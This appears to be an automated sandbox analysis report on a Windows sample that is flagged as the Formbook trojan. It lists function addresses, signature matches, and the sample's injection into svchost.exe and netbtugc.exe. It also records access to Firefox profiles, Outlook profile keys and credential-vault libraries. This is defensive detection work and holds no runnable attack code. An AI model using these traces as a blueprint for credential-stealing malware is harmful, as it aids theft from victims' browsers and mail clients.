            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E2F304_2_031E2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03182F284_2_03182F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031B4F404_2_031B4F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031BEFA04_2_031BEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03132FC84_2_03132FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314CFE04_2_0314CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FEE264_2_031FEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03140E594_2_03140E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03152E904_2_03152E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FCE934_2_031FCE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FEEDB4_2_031FEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031DCD1F4_2_031DCD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314AD004_2_0314AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03158DBF4_2_03158DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0313ADE04_2_0313ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03140C004_2_03140C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E0CB54_2_031E0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03130CF24_2_03130CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F132D4_2_031F132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0312D34C4_2_0312D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0318739A4_2_0318739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031452A04_2_031452A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315B2C04_2_0315B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E12ED4_2_031E12ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0320B16B4_2_0320B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0312F1724_2_0312F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317516C4_2_0317516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314B1B04_2_0314B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031EF0CC4_2_031EF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031470C04_2_031470C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F70E94_2_031F70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FF0E04_2_031FF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FF7B04_2_031FF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031856304_2_03185630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F16CC4_2_031F16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F75714_2_031F7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031DD5B04_2_031DD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032095C34_2_032095C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FF43F4_2_031FF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031314604_2_03131460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFB764_2_031FFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315FB804_2_0315FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031B5BF04_2_031B5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317DBF94_2_0317DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFA494_2_031FFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F7A464_2_031F7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031B3A6C4_2_031B3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031DDAAC4_2_031DDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03185AA04_2_03185AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E1AA34_2_031E1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031EDAC64_2_031EDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031D59104_2_031D5910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031499504_2_03149950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315B9504_2_0315B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031AD8004_2_031AD800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031438E04_2_031438E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFF094_2_031FFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03141F924_2_03141F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFFB14_2_031FFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03103FD24_2_03103FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03103FD54_2_03103FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03149EB04_2_03149EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F1D5A4_2_031F1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03143D404_2_03143D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F7D734_2_031F7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315FDC04_2_0315FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031B9C324_2_031B9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFCF24_2_031FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_025415E04_2_025415E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0253C7D04_2_0253C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0253C7C74_2_0253C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0253AA704_2_0253AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0253C9F04_2_0253C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_025430F04_2_025430F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_025430EE4_2_025430EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02559FD04_2_02559FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAA0AF4_2_02DAA0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAB8B44_2_02DAB8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAB9D64_2_02DAB9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAADD84_2_02DAADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DABD6C4_2_02DABD6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 278 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0312B970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03175130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 031BF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03187E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 031AEA12 appears 86 times
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: String function: 006F0A30 appears 46 times
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: String function: 006EF9F2 appears 40 times
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: String function: 006D9CB3 appears 31 times
            Source: QLLafoDdqv.exe, 00000000.00000003.2119469328.00000000040A3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs QLLafoDdqv.exe
            Source: QLLafoDdqv.exe, 00000000.00000003.2121982850.000000000424D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs QLLafoDdqv.exe
            Source: QLLafoDdqv.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@18/14
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_007437B5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_007310BF AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_007316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_007451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0075A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0074648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006D42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | File created: C:\Users\user\AppData\Local\Temp\aut1BE0.tmp
            Source: QLLafoDdqv.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B82000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2448891881.0000000002B82000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4567487590.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2448785974.0000000002B62000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4567487590.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: QLLafoDdqv.exe | ReversingLabs: Detection: 55%
            Source: QLLafoDdqv.exe | Virustotal: Detection: 40%
            Source: unknown | Process created: C:\Users\user\Desktop\QLLafoDdqv.exe "C:\Users\user\Desktop\QLLafoDdqv.exe"
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QLLafoDdqv.exe"
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: QLLafoDdqv.exe | Static file information: File size 1229824 > 1048576
            Source: QLLafoDdqv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: QLLafoDdqv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: QLLafoDdqv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: QLLafoDdqv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: QLLafoDdqv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: QLLafoDdqv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: QLLafoDdqv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WOaBXdWwIJKzuV.exe, 00000003.00000002.4564777627.0000000000D5E000.00000002.00000001.01000000.00000004.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4568620596.0000000000D5E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: QLLafoDdqv.exe, 00000000.00000003.2121082522.0000000004120000.00000004.00001000.00020000.00000000.sdmp, QLLafoDdqv.exe, 00000000.00000003.2125915509.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178687153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2180433869.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2270123023.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2272280186.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: QLLafoDdqv.exe, 00000000.00000003.2121082522.0000000004120000.00000004.00001000.00020000.00000000.sdmp, QLLafoDdqv.exe, 00000000.00000003.2125915509.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2270155402.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2270155402.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178687153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2180433869.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2270123023.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2272280186.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4578682189.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2269979918.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2238927543.000000000281A000.00000004.00000020.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4570954462.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.000000000372C000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2556821079.0000000006F3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.000000000372C000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2556821079.0000000006F3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2269979918.0000000002800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2238927543.000000000281A000.00000004.00000020.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000003.00000002.4570954462.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: QLLafoDdqv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: QLLafoDdqv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: QLLafoDdqv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: QLLafoDdqv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: QLLafoDdqv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_006D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_006D42DE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_006F0A76 push ecx; ret 0_2_006F0A89
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024EE2BA push 00000038h; iretd 2_2_024EE2BE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024D48A9 push esp; ret 2_2_024D48AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024D17E5 push ebp; retf 003Fh 2_2_024D17E6
